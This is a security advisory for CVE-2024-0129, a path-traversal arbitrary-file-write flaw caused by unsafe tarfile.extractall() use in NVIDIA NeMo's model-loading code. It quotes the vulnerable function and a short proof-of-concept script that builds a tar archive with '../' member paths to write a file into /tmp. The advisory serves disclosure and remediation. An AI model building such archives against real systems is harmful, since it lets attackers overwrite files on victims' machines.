Unsafe extraction of NeMo archive leading to arbitrary file write
CVE Number
CVE-2024-0129
Summary
The _unpack_nemo_file function used by the SaveRestoreConnector class for model loading uses tarfile.extractall() in an unsafe way which can lead to an arbitrary file write when a model is loaded.
Products Impacted
This vulnerability is present in Nvidia NeMo versions prior to r2.0.0rc0.
CVSS Score: 6.3
AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CWE Categorization
CWE‑22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Details
The cause of this vulnerability is in the _unpack_nemo_file function within the file /nemo/core/connectors/save_restore_connector.py.
def _unpack_nemo_file(path2file: str, out_folder: str, extract_config_only: bool = False) -> str:
if not os.path.exists(path2file):
raise FileNotFoundError(f"{path2file} does not exist")
# we start with an assumption of uncompressed tar,
# which should be true for versions 1.7.0 and above
tar_header = "r:"
try:
tar_test = tarfile.open(path2file, tar_header)
tar_test.close()
except tarfile.ReadError:
# can be older checkpoint => try compressed tar
tar_header = "r:gz"
tar = tarfile.open(path2file, tar_header)
if not extract_config_only:
tar.extractall(path=out_folder)
else:
members = [x for x in tar.getmembers() if ".yaml" in x.name]
tar.extractall(path=out_folder, members=members)
tar.close()
return out_folder
The _unpack_nemo_file function is used by several functions and classes in NVIDIA NeMo, most notably the SaveRestoreConnector class which is used to save and load NeMo model files from disk.
To replicate this vulnerability, you simply need to create a tar archive containing a file with a relative path and load the archive with the SaveRestoreConnector restore_from function:
import tarfile
open("test.txt","w").write("This is a test file")
def change_name(tarinfo):
tarinfo.name = "../../../../../../../../tmp/" + tarinfo.name
return tarinfo
with tarfile.open("test.nemo", "w:gz") as tar:
tar.add("test.txt", filter=change_name)
#Load the archive with restore_from
import nemo.collections.asr as nemo_asr
model = nemo_asr.models.EncDecDiarLabelModel.restore_from(restore_path="test.nemo")
This results in test.txt being written to the /tmp/ directory: